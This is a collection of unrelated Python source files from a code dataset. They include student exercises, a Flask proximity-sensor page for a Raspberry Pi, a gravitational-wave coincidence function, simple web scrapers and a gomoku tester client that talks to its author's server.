+{"seq_id":"555828072","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 21 21:05:46 2017\n\n@author: CHEN Anhua\n\"\"\"\n#import numpy as np\nimport calculator as cal\nimport box\nimport random\n\n\n# prob1\nprob1 = lambda my_list: [min(my_list), max(my_list), sum(my_list)/len(my_list)]\n\n# prob2\n#numbers\n\nnumbers = 3\nnumbers2 = numbers\nnumbers2 += 1\nif numbers == numbers2:\n print(\"numbers:\", \" mutable\")\nelse:\n print(\"numbers:\", \" immutable\")\n\n#strings\nstrings = \"uchicago\"\nstrings2 = strings\nstrings2 += 'a'\nif strings == strings2:\n print(\"strings:\", \" mutable\")\nelse:\n print(\"strings:\", \" immutable\")\n\n#lists\nlists = [1,2,3]\nlists2 = lists\nlists2.append(1)\nif lists == lists2:\n print(\"lists:\", \" mutable\")\nelse:\n print(\"lists:\", \" immutable\")\n\n\n#tuples\ntuples = (1, 2, 4)\ntuples2 = tuples\ntuples2 += (1,)\nif tuples == tuples2:\n print(\"tuples:\", \" mutable\")\nelse:\n print(\"tuples:\", \" immutable\")\n\n# dictionaries\ndictionary = {1: \"b\", 2: \"x\"}\ndictionary2 = dictionary\ndictionary2[1] = 'a'\nif dictionary == dictionary:\n print(\"dictionary:\", \" mutable\")\nelse:\n print(\"dictionary:\", \" immutable\")\n\n\n# prob3\n# the calculator.py is stored in the same directory\ndef newfunc(a, b):\n result = cal.sqrtcal(cal.sumcal(cal.productcal(a,a), cal.productcal(b,b)))\n return result\nprint(newfunc(3, 4))\n\n\n#prob4\n\n# shut the box game\n# -*- coding: utf-8 -*-\n\"\"\"\nScript for shut the box game\n\"\"\"\n\nimport random\nimport box as box\nimport sys\n\n# We firstly print the name of the player\nif len(sys.argv) != 2:\n player_name = input(\"Please enter your name: \")\nelse:\n player_name = ''.join(sys.argv[1:])\n\n# set some initial parameters\nremaining_list = list(range(1,10))\nstopper = True\n\nwhile stopper:\n print(\"\\nNumbers left: \", remaining_list) # prinitng the remaining list\n # generate the dice roll\n if (sum(remaining_list) > 6):\n roll = random.choice(list(range(2, 13))) # generate a random 2-dice roll\n else:\n roll = random.choice(list(range(1, 7))) # generate a random 1-dice roll\n print(\"Roll: \", roll)\n stopper = box.isvalid(roll, remaining_list)\n if stopper:\n player_input = input(\"Numbers to eliminate: \")\n elimination = box.parse_input(player_input, remaining_list)\n while not elimination or sum(elimination) != roll:\n print(\"Invalid output!\")\n player_input = input(\"Numbers to eliminate: \")\n elimination = box.parse_input(player_input, remaining_list)\n remaining_list = [n for n in remaining_list if n not in elimination]\n #stopper = box.isvalid(roll, remaining_list)\n else:\n print(\"Game over!\")\n#print(\"Game over!\")\nscore = sum(remaining_list)\nprint(\"\\n Score for \", player_name, \": \", score)\nif score == 0:\n print(\"Congrats! You shut the box!\")\n","sub_path":"probsets/computation/probset1/StandardLibraryProbset.py","file_name":"StandardLibraryProbset.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"121594843","text":"from typing import Dict, List, Optional, TypedDict, TYPE_CHECKING\n\nfrom pydiet import persistence, completion, flags, nutrients, quantity, ingredients, tags, time, steps\n\nif TYPE_CHECKING:\n from pydiet.persistence.supports_persistence import DBInfo, PersistenceInfo\n\n\nclass RecipeData(TypedDict):\n name: Optional[str]\n ingredient_composition: Dict[str, 'IngredientCompositionData']\n serve_intervals: List[str]\n steps: Dict[int, str]\n tags: List[str]\n\n\ndef get_empty_recipe_data() -> RecipeData:\n return RecipeData(\n name=None,\n ingredient_composition={},\n serve_intervals=[],\n steps={},\n tags=[]\n )\n\n\ndef get_new_recipe() -> 'Recipe':\n return Recipe(get_empty_recipe_data())\n\n\nclass Recipe(persistence.supports_persistence.SupportsPersistence,\n completion.supports_completion.SupportsCompletion,\n flags.supports_flags.SupportsFlags,\n nutrients.supports_nutrient_content.SupportsNutrientContent,\n quantity.supports_bulk.SupportsBulk,\n ingredients.supports_ingredient_composition.SupportsSettingIngredientComposition,\n tags.supports_tags.SupportsSettingTags,\n time.supports_serve_times.SupportsSettingServeTimes,\n steps.supports_steps.SupportsSettingSteps):\n\n def __init__(self, data: 'RecipeData', datafile_name: Optional[str] = None):\n self._data = data\n self._datafile_name = datafile_name\n self._name: Optional[str] = None\n\n @property\n def _flags_data(self) -> Dict[str, Optional[bool]]:\n flags_data = flags.supports_flags.get_empty_flags_data()\n for flag_name in flags_data:\n flags_data[flag_name] = True\n for ic in self._ingredient_composition:\n if ic.ingredient.get_flag_value(flag_name) is False:\n flags_data[flag_name] = False\n continue\n elif ic.ingredient.get_flag_value(flag_name) is None:\n flags_data[flag_name] = None\n return flags_data\n\n @property\n def _ingredient_composition(self) -> Dict[str, 'IngredientPercentageData']:\n ...\n\n @property\n def _nutrients_data(self) -> Dict[str, 'NutrientData']:\n ...\n\n @property\n def missing_mandatory_attrs(self) -> List[str]:\n attr_names = []\n if not self.name_is_defined:\n attr_names.append('name')\n if len(self.ingredients) == 0:\n attr_names.append('ingredients')\n if len(self.tags) == 0:\n attr_names.append('tags')\n if len(self.serve_times) == 0:\n attr_names.append('serve_times')\n return attr_names\n\n @property\n def name(self) -> Optional[str]:\n return self._name\n\n @property\n def name_is_defined(self) -> bool:\n return self.name is None\n\n @property\n def _persistence_info(self) -> 'PersistenceInfo':\n return persistence.supports_persistence.PersistenceInfo(\n data=self._data,\n datafile_name=self._datafile_name\n )\n\n @staticmethod\n def get_db_info() -> 'DBInfo':\n return persistence.supports_persistence.DBInfo(\n unique_field_name='name',\n path_into_db=persistence.configs.recipe_db_path\n )\n\n def set_datafile_name(self, datafile_name: str) -> None:\n self._datafile_name = datafile_name\n\n def set_name(self, value: str) -> None:\n self.set_unique_field(value)\n","sub_path":"pydiet/recipes/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643266139","text":"# rotate an array in place\ndef rotate(a, n):\n \n old_a = a.copy() # O(n) memory tho\n for i in range(len(a)):\n a[i] = old_a[(i + n) % len(a)]\n \n return a\n\n\n# rotate an array in place using const memory\n# issue is that you're modifying the array as you use it\ndef rotate2(a, n):\n \n old_a = a.copy()\n for i in range(len(a)):\n a[i] = old_a[(i + n) % len(a)]\n \n return a\n\n\n# print('a = {}, a[{}] = {}, a[{}] = {}'.format(old_a, i, old_a[i], (i + n) % len(a), old_a[(i + n) % len(a)]))\n# print(rotate(list(range(4)), 2))\n# print(rotate(list(range(5)), 2))\n# print(rotate(list(range(6)), 2))\n# print(rotate(list(range(7)), 2))\n\n# note: trick is to do three reverse operations\n# reverse can be done using swaps\n# one reverse for whole array, two for each partition of the rotation\n\n# reversing array in place\ndef reverse(a):\n i, j = 0, len(a) - 1\n while i < j:\n a[i], a[j] = a[j], a[i]\n i += 1\n j -= 1\n return a\n\n# what if we use a generator for yielding proper values of old array? \n# a is an object that consists of a pointer and size\n# this probably uses O(n) memory, not O(1) mem\ndef create_gen(a, k):\n for i in range(len(a)):\n yield a[(i + k) % len(a)]\n\ndef rotate3(a, k):\n\n g = create_gen(a.copy(), k)\n\n for i in range(len(a)):\n a[i] = next(g)\n\n return a\n\n# print(reverse(list(range(5))))\nprint(rotate3(list(range(5)), 2))\n","sub_path":"rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"448468090","text":"# -*- coding:utf-8 -*-\n\n#定义类\nclass Cat:\t#class关键字定义类,类名首字母大写\n\t#属性\n\t#方法, def在类里面使用就是定义方法,要在第一个参数的位置加上self\n\tdef eat(self):\n\t\tprint(\"猫在吃鱼...\")\n\n\n#创建对象\ncat = Cat() #类创建的对象是引用类型,类名+()表示新建对象,然后cat指向这个对象\ncat.eat()\n#print(help(Cat))\n#print(help(cat.eat))\n\n\n\n\n","sub_path":"面向对象/01定义类创建对象.py","file_name":"01定义类创建对象.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"395751703","text":"#!/usr/bin/env python\nimport logging\nimport sys\nimport unittest\nimport scipy as sp\nimport numpy as np\nimport mango.mpi as mpi\nimport mango.image\nimport mango.io\n\nlogger, rootLogger = mpi.getLoggers(__name__)\n\nclass DiscreteGaussianDownsampleTest(unittest.TestCase):\n def setUp(self):\n subdShape = sp.array((32,128,64))\n mpiCartShape = mango.mpi.getCartShape(dimension=3)\n mpiCartShape = sp.array(mpiCartShape)\n\n self.imgShape = mpiCartShape*subdShape\n\n def doTestDiscreteGaussianDownsampleWithHalo(self, haloSz=0):\n if (isinstance(haloSz, int) or ((sys.version_info.major < 3) and isinstance(haloSz, long))):\n if (haloSz < 0):\n haloSz = 0\n haloSz = sp.array((haloSz,)*3)\n \n imgDds = mango.zeros(shape=self.imgShape, mtype=\"tomo_float\", halo=haloSz)\n imgDds.md.setVoxelSize((1,1,1));\n imgDds.md.setVoxelSizeUnit(\"mm\");\n \n logger.info(\"imgDds.mtype=%s\" % imgDds.mtype)\n logger.info(\"imgDds.md.getVoxelSize()=%s\" % imgDds.md.getVoxelSize())\n rspDds = \\\n mango.image.gaussian_downsample(\n imgDds,\n interptype=mango.image.InterpolationType.LINEAR,\n voxsz=4.0*sp.array(imgDds.md.getVoxelSize())\n )\n logger.info(\"imgDds.shape=%s\" % imgDds.shape)\n logger.info(\"rspDds.shape=%s\" % rspDds.shape)\n\n slc = []\n for d in range(len(haloSz)):\n slc.append(slice(haloSz[d], rspDds.asarray().shape[d]-haloSz[d]))\n \n slc = tuple(slc)\n \n self.assertTrue(sp.all(imgDds.dtype == rspDds.dtype))\n self.assertTrue(sp.all(imgDds.mtype == rspDds.mtype), \"%s != %s\" % (imgDds.mtype, rspDds.mtype))\n self.assertTrue(sp.all(imgDds.halo == rspDds.halo))\n self.assertTrue(sp.all(((imgDds.shape)//4) == rspDds.shape))\n self.assertTrue(sp.all(imgDds.origin//4 == rspDds.origin), \"%s != %s\" % (imgDds.origin, rspDds.origin))\n self.assertTrue(sp.all(imgDds.mpi.shape == rspDds.mpi.shape))\n self.assertTrue(sp.all(imgDds.md.getVoxelSize()*4 == rspDds.md.getVoxelSize()))\n\n logger.info(\"imgDds min = %s, imgDds max = %s\" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))\n logger.info(\"rspDds min = %s, rspDds max = %s\" % (np.min(rspDds.asarray()[slc]), np.max(rspDds.asarray()[slc])))\n logger.info(\"num non-zero rspDds = %s\" % sp.sum(sp.where(rspDds.asarray()[slc] != 0, 1, 0)))\n \n self.assertTrue(sp.all(imgDds.asarray() == 0))\n self.assertTrue(sp.all(rspDds.asarray()[slc] == 0))\n\n imgDds = mango.zeros(shape=self.imgShape, mtype=\"tomo\", halo=haloSz, origin=(2,-8,4))\n imgDds.md.setVoxelSize((1,1,1));\n imgDds.md.setVoxelSizeUnit(\"mm\");\n\n rspDds = \\\n mango.image.gaussian_downsample(\n imgDds,\n interptype=mango.image.InterpolationType.CATMULL_ROM_CUBIC_SPLINE,\n factor=(0.5,0.5,0.5)\n )\n slc = []\n for d in range(len(haloSz)):\n slc.append(slice(haloSz[d], rspDds.asarray().shape[d]-haloSz[d]))\n \n slc = tuple(slc)\n\n self.assertTrue(sp.all(imgDds.dtype == rspDds.dtype))\n self.assertTrue(sp.all(imgDds.mtype == rspDds.mtype))\n self.assertTrue(sp.all(imgDds.halo == rspDds.halo))\n self.assertTrue(sp.all(imgDds.shape//2 == rspDds.shape))\n self.assertTrue(sp.all(imgDds.origin//2 == rspDds.origin), \"%s != %s\" % (imgDds.origin//2, rspDds.origin))\n self.assertTrue(sp.all(imgDds.mpi.shape == rspDds.mpi.shape))\n self.assertTrue(sp.all(imgDds.md.getVoxelSize() == rspDds.md.getVoxelSize()/2))\n\n logger.info(\"imgDds min = %s, imgDds max = %s\" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))\n logger.info(\"rspDds min = %s, rspDds max = %s\" % (np.min(rspDds.asarray()[slc]), np.max(rspDds.asarray()[slc])))\n logger.info(\"num 
non-zero rspDds = %s\" % sp.sum(sp.where(rspDds.asarray()[slc] != 0, 1, 0)))\n \n self.assertTrue(sp.all(imgDds.asarray() == 0))\n self.assertTrue(sp.all(rspDds.asarray()[slc] == 0))\n\n def testDiscreteGaussianDownsampleWithHalo0(self):\n self.doTestDiscreteGaussianDownsampleWithHalo(0)\n\n def testDiscreteGaussianDownsampleWithHalo1(self):\n self.doTestDiscreteGaussianDownsampleWithHalo(2)\n\n def testDiscreteGaussianDownsampleWithHalo2(self):\n self.doTestDiscreteGaussianDownsampleWithHalo(4)\n\nif __name__ == \"__main__\":\n mango.setLoggingVerbosityLevel(\"high\")\n mpi.initialiseLoggers(\n [__name__, \"mango.mpi\", \"mango.image\", \"mango.imageTest\"],\n logLevel=logging.INFO\n )\n unittest.main()\n","sub_path":"misc/python/mango/imageTest/_DiscreteGaussianDownsampleTest.py","file_name":"_DiscreteGaussianDownsampleTest.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"377132798","text":"#creds to Balaji as well for making the continous analysis function!\n\nimport socket, threading, json, contextlib, io, time\nfrom random import *\n\ngomoku = __import__(\"gomoku\") #put your filename here (pls for the love of god run this shit in the same folder as your file (and for the love of jesus do not pyzo this))\n\nHEADER = 16\nDELAY = 0.5 #hehehehe\nPORT = 5555\nFORMAT = 'utf-8'\nHOST_IP = '172.105.7.203' #hey those trying to hack my server! there ain't shit on there so gl + my gomoku server is run within a try statement so good f****** luck trying to break that shit\n\nclass Network:\n\n def __init__(self):\n self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.host = HOST_IP \n self.addr = (self.host, PORT)\n self.id = self.connect()\n\n def connect(self):\n self.client.connect(self.addr)\n self.client.send(str.encode('controller'))\n received_message = self.client.recv(2048).decode(FORMAT)\n print(received_message)\n\n def send(self, data):\n \"\"\"\n :param data: str\n :return: str\n \"\"\"\n try:\n self.client.send(str.encode(\"a:\" + str(data)))\n print(\"DONE\")\n except socket.error as e:\n return str(e)\n\n def get_analysis(self, board):\n self.client.send(str.encode('A:' + json.dumps(board)))\n return self.client.recv(2048).decode(FORMAT)\n\n def get_win(self, board):\n self.client.send(str.encode('W:' + json.dumps(board)))\n return self.client.recv(2048).decode(FORMAT)\n\n def get_search(self, board):\n self.client.send(str.encode('S:' + json.dumps(board)))\n return self.client.recv(2048).decode(FORMAT)\n\nclass client():\n\n def __init__(self):\n self.network = Network()\n\n def run(self):\n not_ended = True\n print(\"Hello! Welcome to mrmandarin's Gomoku testing program!\")\n while(not_ended):\n print(\"Here are your options:\")\n print(\"1 - Analyse Once\")\n print(\"2 - Continuously Analyse\")\n print(\"3 - Check Win Once\")\n print(\"4 - Continuously Check Win\")\n print(\"5 - Continously Check Search_Max\")\n print(\"6 - Exit\")\n s = input()\n if(s == '6'):\n not_ended = False\n elif(s == '1'):\n self.analyze()\n elif(s == '2'):\n self.continuous_analysis()\n elif(s == '3'):\n self.compare_win()\n elif(s == '4'):\n self.continuous_win()\n elif(s == '5'):\n self.continuous_search_max()\n else:\n print(\"Dafuq you entered boii\")\n\n def analyze(self):\n print(\"ANALYSING!\")\n print(\"GENERATED BOARD:\")\n board = self.generate_random_board()\n gomoku.print_board(board)\n print(\"HERE'S YOUR ANALYSIS:\")\n gomoku.analysis(board)\n print(\"-------------------------------\")\n analysis = json.loads(self.network.get_analysis(board))\n print(\"HERE'S MRMANDARINS ANALYSIS:\")\n for a in analysis:\n print(a)\n print('\\n')\n\n def continuous_win(self):\n board = self.generate_random_board()\n correct_cnt = 0\n\n while(gomoku.is_win(board) == self.network.get_win(board) or self.network.get_win(board) == \"Impossible\"):\n print(gomoku.is_win(board))\n print(self.network.get_win(board))\n correct_cnt += 1\n print(f\"Number of correct matches: {correct_cnt}\")\n time.sleep(DELAY)\n board = self.generate_random_board()\n\n print(\"\\n\\nSomething Doesn't Match!\")\n print(\"Here's the board:\")\n gomoku.print_board(board)\n print(\"YOUR PROGRAM CLAIMS: \")\n print(gomoku.is_win(board))\n print('-------------------------------')\n print(\"MRMANDARINS'S PROGRAM CLAIMS:\")\n print(self.network.get_win(board))\n print('\\n')\n\n def continuous_search_max(self):\n print(\"USE AT YOUR OWN RISK CUZ SCORE DO BE WHACK\")\n board = 
self.generate_random_board()\n correct_cnt = 0\n\n while(str(gomoku.search_max(board)) == self.network.get_search(board)):\n print(str(gomoku.search_max(board)))\n print(self.network.get_search(board))\n correct_cnt += 1\n print(f\"Number of correct matches: {correct_cnt}\")\n time.sleep(DELAY)\n board = self.generate_random_board()\n\n print(\"WE HAVE FOUND AN ERROR ^_^\")\n print(\"Here's the board:\")\n gomoku.print_board(board)\n print(\"YOUR PROGRAM CLAIMS: \")\n print(str(gomoku.search_max(board)))\n print('-------------------------------')\n print(\"MRMANDARINS'S PROGRAM CLAIMS:\")\n print(self.network.get_search(board))\n print('\\n')\n\n def compare_win(self):\n print(\"Impossible refers to when both white and black have winning sequences, this will not be tested.\")\n print(\"GENERATED BOARD:\")\n board = self.generate_random_board()\n gomoku.print_board(board)\n print(\"YOUR PROGRAM CLAIMS:\")\n print(gomoku.is_win(board))\n print(\"-------------------------------\")\n print(\"MRMANDARINS'S PROGRAM CLAIMS:\")\n print(self.network.get_win(board))\n \n def continuous_analysis(self): #thanks Balaji!\n yourAnalysis = []\n serverAnalysis = []\n board = None\n correct_counter = 0\n print(\"To go back to menu just restart the program\")\n while yourAnalysis == serverAnalysis:\n correct_counter += 1\n board = self.generate_random_board()\n\n f = io.StringIO()\n with contextlib.redirect_stdout(f): # temporarily redirect console output to a string buffer \n gomoku.analysis(board)\n yourAnalysis = f.getvalue().split(\"\\n\")[0:-1] # readlines() didn't work\n \n serverAnalysis = json.loads(self.network.get_analysis(board)) \n \n time.sleep(DELAY) # no DDos :)\n print(\"Correct:\", correct_counter) # my highscore is 17023\n\n print(\"\\nFound a case that doesn't work!\")\n print(\"\\nThis is the list version of the board (for copy-paste):\\n\", board)\n print(\"\\nBoard:\")\n gomoku.print_board(board)\n print(\"\\nHere is the difference between the analyses:\\n\")\n\n # if analyses aren't the same length, then you messed up gomoku.analysis()\n for i in range(len(serverAnalysis)): \n \n # which stone colour?\n if yourAnalysis[i].find(\"stones\") >= 0:\n print(yourAnalysis[i])\n # either print only the lines that are wrong:\n if yourAnalysis[i] != serverAnalysis[i]:\n print(\" Your:\", yourAnalysis[i])\n print(\"Server:\", serverAnalysis[i])\n print(\"\")\n\n #this returns a randomized board, you can also make this return your own custom board to test it against my program\n def generate_random_board(self):\n board = []\n for i in range(8):\n board.append([\" \"]*8)\n for i in range(randint(5, 30)):\n #this below is absolutely disgusting code but just let it be, man's on a time crunch\n yeee = ('w', 'b')\n try:\n gomoku.put_seq_on_board(board, randint(0, 7), randint(0, 7), randint(-1, 1), randint(0, 1), randint(2, 5), yeee[randint(0,1)])\n except:\n i -= 1\n return board\n '''\n str_board = json.dumps(board)\n return json.loads(str_board)\n '''\n\nroot = client()\nroot.run()\n","sub_path":"gomoku/gomoku_tester.py","file_name":"gomoku_tester.py","file_ext":"py","file_size_in_byte":7688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"45902538","text":"\"\"\" Reading a file into Python\"\"\"\n\njabber = open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r')\n\n#Printing the entire file:\nfor line in jabber:\n print(line)\n\n# Searching and printing via keywords:\nfor line in jabber:\n if \"jabberwock\" in line.lower():\n print(line, end='')\n\njabber.close()\n\n# Using \"with\" for better object manangement. With performs close()\n#automatically:\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n for line in jabber:\n if \"JAB \" in line.upper():\n print(line, end='')\n\n# Setting a variable to readline()\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n line = jabber.readline()\n while line:\n print(line, end='')\n # resetting line to readline() continues the line by line processeing\n # of the file until no more lines can be read\n line = jabber.readline()\n\n# Using readlines() to read the entire file and return a list []\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n lines = jabber.readlines()\nprint(lines)\n\n# Process the lines[] list:\nfor line in lines:\n print(line, end='')\n\n\n# Using a range with the lines[] list\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n lines = jabber.readlines()\nprint(type(lines))\n\n# Process the lines[] list:\nfor line in lines[::-1]:\n print(line, end='')\n\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n lines = jabber.read()\nprint(type(lines))\n\n# Summary:\n# read() reads an entire file in as one string\n# readline() reads a single line from a file and returns a sting\n# readlines() reads and entire file and returns a list[] of strings\n\n# readline() is the preferred method with large files, as it does not read\n# the entire file into memory\n\n\n\n\n\n","sub_path":"python_InputOutput/reading_from_file.py","file_name":"reading_from_file.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"649366863","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sqlite3 as lite\nimport sys\n\n#Author: Ekram\n#Using flask python web framework,javascript,html,css, some jquery,JSON and some ajax\n#Basic understanding on the above required to understand code. Recommend going this route pythob->html->css->jscript->jquery->flask->sql->JSON and ajax\n#Ajax is awesome in that it lets you load a specific variable from any function and edit it directly asyncronously into any webpage element, could not get\n#it to work properly yet so omitted as of now. Must look into it to stop WHOLE page from having to refresh every 1 second\n#After running this code the function index will host a webpage on the raspberry pi at http://localhost:5000, instead of localhost put pi IP address\n#The webpage hosted is configured to refresh automatically every 1 second. And so every 1 second the proximity function is called and checks the distance\n#The proximity distance is also sent to an sqlite database so that other concurrent programs can access it and work upon that argument \n\nfrom flask import Flask, render_template, request, url_for\nimport time\nimport RPi.GPIO as GPIO\n# Initialize the Flask application\napp = Flask(__name__)\n\n# Define a route for the default URL, which loads the form\n@app.route('/')\ndef index():\n PDISTANCE = Proximity()\n \n #SQLITE SECTION. BASICALLY SENDING PROXIMITY READINGS INTO A TABLE DATABASE TO BE USED IN OTHER PROGRAMS AS MOTOR ARGUMENT#\n con = lite.connect('T7.db')\n name = \"Ekram\"\n\n with con:\n \n cur = con.cursor()\n cur.execute(\"DROP TABLE IF EXISTS MonitorValues\")\n cur.execute(\"CREATE TABLE MonitorValues(Proximity INT, Name TEXT)\")\n cur.execute(\"INSERT INTO MonitorValues (Proximity,Name) VALUES(?,?)\",(PDISTANCE,name))\n #SQLITE SECTION END-----------------------------------------------------------------------------------------------------#\n \n if (PDISTANCE>1):\n DBool = 1 #I will use this bit as the argument to load red led image or safe led image on the website\n else:\n DBool = 0\n Monitor_Variables = { # Storing variables as JSON to allow it to pass between javascript and python [note that str means string so all variables must be converted to string first] \n 'Distance': str(PDISTANCE),\n 'Bool' : str(DBool)\n } \n \n #---------------------THIS WHOLE THING WILL BE LOADED INTO THE BROWSER OF WHOEVER GOES TO THE address localhost:5000, can use templates instead which makes for nicer looking code---------#\n return '''\n\n \n \n Home Page \n \n \n Obstacle in front of you is appx ''' + Monitor_Variables['Distance'] + ''' cm away
\n \n
\n \n \n \n '''\n\n#---------------------Cannot comment on the above since whole thing is a string. Consult hand written notes to understand and remember what they do---------#\n#---------------------Key thing to note is Monitor_variables which through JSON allows jscript and python to intermingle------------------------------------#\n\n#The Ultra sound sensor function which will be called into the index function above every 1 second due to the webpage auto refreshing every 1 second\ndef Proximity():\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n TRIG = 23 #Proximity sensor pins\n ECHO = 24\n \n GPIO.setup(TRIG,GPIO.OUT)\n GPIO.setup(ECHO,GPIO.IN)\n \n GPIO.output(TRIG, False)\n \n GPIO.output(TRIG, True)\n \n time.sleep(0.00001)\n \n GPIO.output(TRIG, False)\n \n while GPIO.input(ECHO)==0:\n\n pulse_start = time.time()\n \n while GPIO.input(ECHO)==1:\n\n pulse_end = time.time()\n \n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration*1750\n distance = round(distance, 2)\n print (\"Distance:\",distance,\"cm\")\n return distance\n\n\n#This will effectively host the page \nif __name__ == '__main__':\n \n app.run(debug=True, host='0.0.0.0')\n","sub_path":"Proximity_Flask.py","file_name":"Proximity_Flask.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"216682221","text":"# Copyright (C) 2015 Alex Nitz\n#\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3 of the License, or (at your\n# option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\n# Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n#\n# =============================================================================\n#\n# Preamble\n#\n# =============================================================================\n#\n\"\"\" This modules contains functions for calculating and manipulating\ncoincident triggers.\n\"\"\"\nimport numpy\n\ndef time_coincidence(t1, t2, window, slide_step=0):\n \"\"\" Find coincidences by time window\n \n Parameters\n ----------\n t1 : numpy.ndarray\n Array of trigger times from the first detector\n t2 : numpy.ndarray\n Array of trigger times from the second detector\n window : float\n The coincidence window in seconds\n slide_step : optional, {None, float}\n If calculating background coincidences, the interval between background\n slides in seconds.\n \n Returns\n -------\n idx1 : numpy.ndarray\n Array of indices into the t1 array.\n idx2 : numpy.ndarray \n Array of indices into the t2 array.\n slide : numpy.ndarray\n Array of slide ids \n \"\"\"\n if slide_step:\n fold1 = t1 % slide_step\n fold2 = t2 % slide_step\n else:\n fold1 = t1\n fold2 = t2\n \n sort1 = fold1.argsort()\n sort2 = fold2.argsort() \n fold1 = fold1[sort1]\n fold2 = fold2[sort2]\n \n if slide_step:\n fold2 = numpy.concatenate([fold2 - slide_step, fold2, fold2 + slide_step])\n sort2 = numpy.concatenate([sort2, sort2, sort2])\n\n left = numpy.searchsorted(fold2, fold1 - window)\n right = numpy.searchsorted(fold2, fold1 + window)\n\n idx1 = numpy.repeat(sort1, right-left)\n idx2 = numpy.concatenate([sort2[l:r] for l,r in zip(left, right)])\n \n if slide_step:\n diff = ((t1 / slide_step)[idx1] - (t2 / slide_step)[idx2])\n slide = numpy.rint(diff)\n else:\n slide = numpy.zeros(len(idx1))\n \n return idx1, idx2, slide\n\n\n","sub_path":"pycbc/events/coinc.py","file_name":"coinc.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"229521785","text":"from .agent import Agent\n\n\nfrom .configuratons import AGENT_CONFIGURATIION_BASE, WAIT_STATE\n\n\nclass AgentFactory:\n @staticmethod\n def create(init_state, configuration):\n agent = Agent()\n for state, action in configuration.items():\n agent.add_action(state, action)\n\n agent.set_state(init_state)\n\n return agent\n\n @classmethod\n def create_from_base_configuration(cls):\n agent = cls.create(\n init_state=WAIT_STATE, configuration=AGENT_CONFIGURATIION_BASE\n )\n\n return agent\n","sub_path":"model/agent/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"638192730","text":"import requests\nimport re\nfrom requests.exceptions import RequestException\nrequests.packages.urllib3.disable_warnings()\n\nurl = 'https://www.12306.cn/index/script/core/common/station_name_v10029.js'\n\ndef get_one_page(url, headers): #打开页面并抛出错误\n try:\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n response.encoding = 'utf-8'\n return response.text\n return None\n except RequestException:\n return None\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7'}\n\njs = get_one_page(url, headers)\nprint(js)\nstations = re.findall('([\\u4e00-\\u9fa5]+)\\|([A-Z]+)', js)\nprint(stations)\nfile = open(\"station_names.txt\", \"w+\", encoding='utf-8')\nfile.truncate()\nfor station in stations:\n file.write(station[0] + ',')\n file.write(station[1] + '\\n')\n\nfile.close()\n\n","sub_path":"crawlers/cityNameScawler.py","file_name":"cityNameScawler.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"392698858","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'eternal'\n\nfrom bs4 import BeautifulSoup\n\nfrom common.crawler import BaseCrawler\n\nclass NeteaseCrawler(BaseCrawler):\n \"\"\"\n 网易新闻\n \"\"\"\n def __init__(self):\n BaseCrawler.__init__(self)\n self.url = \"http://news.163.com\"\n\n def parse_html(self):\n html = self.request(self.url)\n soup = BeautifulSoup(html)\n news = soup.find_all(\"a\", class_=\"ac01\")\n for item in news:\n print(item.getText())\n print(item['href'])\n\n\n\n","sub_path":"news/netease.py","file_name":"netease.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
